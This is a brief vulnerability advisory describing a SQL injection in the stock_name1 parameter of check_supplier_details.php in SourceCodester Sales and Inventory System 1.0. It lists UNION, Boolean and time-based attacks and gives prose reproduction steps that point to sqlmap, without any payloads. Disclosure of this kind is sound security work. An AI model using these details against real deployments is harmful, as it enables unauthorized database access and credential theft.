SourceCodester Sales and Inventory System SQL Injection Vulnerability in Check Supplier Details Component

A SQL injection vulnerability has been identified in SourceCodester Sales and Inventory System version 1.0. The issue resides in the check_supplier_details.php file, specifically within the POST parameter stock_name1. This vulnerability allows authenticated attackers to manipulate the parameter and execute arbitrary SQL commands, potentially leading to unauthorized data access or modification. The injection can be performed remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows for UNION-based, Boolean-based, and Time-based SQL injection attacks, enabling attackers to exfiltrate database information, such as supplier details and credentials, and to manipulate database queries.

Reproduction

To reproduce this vulnerability, log into the application and send a POST request to check_supplier_details.php with a crafted stock_name1 parameter. Alternatively, use sqlmap to automate the exploitation.